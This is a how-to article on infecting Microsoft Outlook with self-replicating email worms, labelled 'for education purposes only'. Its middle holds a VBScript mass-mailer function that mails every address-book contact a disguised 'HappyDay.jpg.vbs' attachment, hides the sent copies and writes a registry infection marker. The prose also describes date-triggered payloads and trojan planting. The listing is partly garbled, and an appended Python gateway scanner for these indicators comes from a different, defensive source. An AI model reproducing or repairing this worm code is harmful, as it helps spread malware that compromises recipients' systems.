Infecting Mail Clients

View Specific



zeroknock [at] secniche.org


For Education Purposes Only!


Analytical View.

The Methodology:
This is the methodology on which the technique is put into practice. It consists of a seven-step approach. I am not discussing the steps in detail; I only lay out the key points that are the necessary components of a simple infection program for an email client. It goes like this:

Mode Of Penetration:
Email viruses always enter your network through vague emails or simply as an attractive attachment. The attachment contains malicious code that installs itself on the system as soon as you open it.

Resident Specificity:
The code that comes with the attachment is in a hidden or encrypted state. It becomes resident in specific system files and manipulates them according to the code defined for it.

Time Sarcasm:
This is a side element that ties the execution of the code to defined time conditions. Until the specific date the virus remains silent, and after the due date the penetration starts. This is a very good technique for setting up an execution environment that delays the effects. That is why some date-driven email viruses are built on this effect.

Malicious code Execution:
This relates to the payload present in the code. It depends entirely on the virus writer's coding: whether he wants it to display pornography or to take any kind of action that hampers the normal functioning of systems.

Consuming System Resources:
Some email viruses are written entirely to consume the resources of the system, leaving it behind as a dead system. This is used in the most devastating scenarios.

Trojan Planting:
Email viruses are also coded to plant a trojan on the remote system so that access is possible on the fly. These are the key points that virus writers always keep in mind when writing email viruses.

Object Panorama:
This relates to the creation of objects that inherit system properties. The objects are created in a scripting language. VBScript is by far the language most favoured by virus writers. It provides powerful properties that the writers manipulate.

	Objects:
			A) Windows scripting object
			B) Windows shell object
			C) Windows filesystem object
			D) Windows application object
			E) Windows OLE object
	
	Set ShellObject = CreateObject("WScript.shell")
	
	Once this object is created, the shell is ready to execute the functions related to it. I think all scripters know this.
	
	Set FileObject = CreateObject("Scripting.fileSystemObject")
	
	This object, as you already know, is used for file-related operations.
	
	Set Object = CreateObject("Outlook.Application")
	
	
This object creates a handle to the Outlook application for carrying out mail functions. These are the three basic objects used as the elements for writing email viruses.

Manifesting Outlook for Distributed Manipulation:
In this section you will come to know how to infect the Outlook application to get your work done. A step-by-step layout will show you how to handle the scripting related to the Outlook application. This layout presents the definitive steps that should be undertaken to infect mail clients. It depends solely on Microsoft Outlook.



	
	Example: a very generic function that lets the Outlook mail client get infected
	
	Function Manifesting_Outlook()
	' On Error Resume Next
	' Set Z2450x001 = CreateObject("Outlook.Application")
	' if Z2450x001 = "Outlook" Then
	' Set Z2450x002 = Z2450x001.GetNameSpace("MAPI")
	' Set Z2450x003 = Z2450x002.AddressLists
	' For Each ObjZ2450x004 in Z2450x003
	' if ObjZ2450x004.AddressEntries.Count  <> 0 Then
	' For Z2450x005 = 1 to ObjZ2450x004
	' Set Z2450x007 = Z2450x001.CreateItem(0)
	' Set Z2450x008 = ObjZ2450x004.AddressEntries(Z2450x005)
	' Z2450x007.To = Z2450x008.Address
	' Z2450x007.Subject = "GIFT,:)"
	'
	' if Z2450x007.Subject = "" Then
	' Z2450x007.Subject = "Hoorah!!!!!"
	' End If
	' Z2450x007.Body = "Hi:You Got Happy Day Gift " [] vbcrlf [] "Hit It" []
	vbcrlf [] ""
	' Set Z2450x009 = Z2450x007.Attachments
	ObjZ2450x0011.Add
	ObjFileSystem00x.GetSpecialFolder(0)"\HappyDay.jpg.vbs"
	' Z2450x007.DeleteAfterSubmit = True
	' if Z2450x007.To <> "" Then
	' Z2450x007.Send
	' ObjRegWrite00x.RegWrite "HKCU\software\BootLicker\Infected","1"
	' End If
	' Next
	' End If
	' Next
	' End if
	
	In the listing above, [] has been used in place of the ampersand.
	


That is a very generic example of how the email client is infected. This type is what email virus and worm writers actually follow. The main idea is to infect and hack all the addresses in Outlook and replicate the malicious code to them one by one, so that the infection is distributed and devastates not only the main machine but every machine attached to it through the network. The main infection occurs through the registry, as most email worms settle in the registry, and registry-to-registry infection occurs from there. Writers also set constraints such as time and date. At that point, i.e. the specific date and time, the infection starts and penetrates the whole network, thereby devastating its normal functioning. Large organizations usually prefer Outlook for centralized working, and therefore they are the writers' prime targets. So the above layout shows the basic actions that lead to the manifestation of Outlook. The process is self-replicating and dynamic in its context.
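
From the defender's side, the indicators in the layout above (Outlook automation, address-book enumeration, programmatic send, a registry marker and a double-extension attachment name) can be checked statically at a mail gateway. The following Python triage is an added example, not code from the original article; the function names, verdict labels, extension lists and sample fragments are assumptions constructed for illustration.

```python
import re

# Extensions Windows executes on double-click, and the harmless-looking
# extensions placed in front of them as a decoy (lists are illustrative).
SCRIPT_EXT = r"(?:vbs|vbe|js|jse|wsf|wsh|hta|scr|bat|cmd|exe)"
DECOY_EXT = r"(?:jpe?g|gif|png|bmp|txt|pdf|docx?|xlsx?)"
DOUBLE_EXT = re.compile(rf"\.{DECOY_EXT}\.{SCRIPT_EXT}$", re.I)

# Static indicators for the behaviours described on this page.
INDICATORS = {
    "outlook_automation": re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', re.I),
    "address_book_walk": re.compile(r"\.(?:AddressLists|AddressEntries)\b", re.I),
    "attachment_add": re.compile(r"\.Attachments\b", re.I),
    "programmatic_send": re.compile(r"\.Send\b", re.I),
    "hide_sent_copy": re.compile(r"\.DeleteAfterSubmit\s*=\s*True", re.I),
    "registry_write": re.compile(r"\.RegWrite\b", re.I),
}
# Automation + address-book enumeration + send is the self-mailing pattern.
MASS_MAILER = {"outlook_automation", "address_book_walk", "programmatic_send"}

def has_double_extension(filename):
    """True for names such as 'picture.jpg.vbs'."""
    return bool(DOUBLE_EXT.search(filename.strip()))

def scan_script(text):
    """Return the set of indicator names found in a script body."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def verdict(filename, text):
    """Return ('block' | 'review' | 'allow', matched indicators)."""
    hits = scan_script(text)
    if has_double_extension(filename) or MASS_MAILER <= hits:
        return "block", hits
    return ("review" if hits else "allow"), hits

# Constructed, non-functional fragments used only as scanner input.
SAMPLE_MAILER = '''
Set app = CreateObject("Outlook.Application")
Set lists = ns.AddressLists
item.DeleteAfterSubmit = True
item.Send
reg.RegWrite "HKCU\\Software\\Example\\Marker", "1"
'''
SAMPLE_BENIGN = 'WScript.Echo "Disk report complete"'

if __name__ == "__main__":
    for name, body in [("HappyDay.jpg.vbs", SAMPLE_MAILER),
                       ("report.vbs", SAMPLE_MAILER),
                       ("diskreport.vbs", SAMPLE_BENIGN)]:
        print(name, *verdict(name, body))
```

String matching of this kind misses scripts that arrive in the hidden or encrypted state described under Resident Specificity, so it belongs alongside outright blocking of script attachment types rather than in place of it.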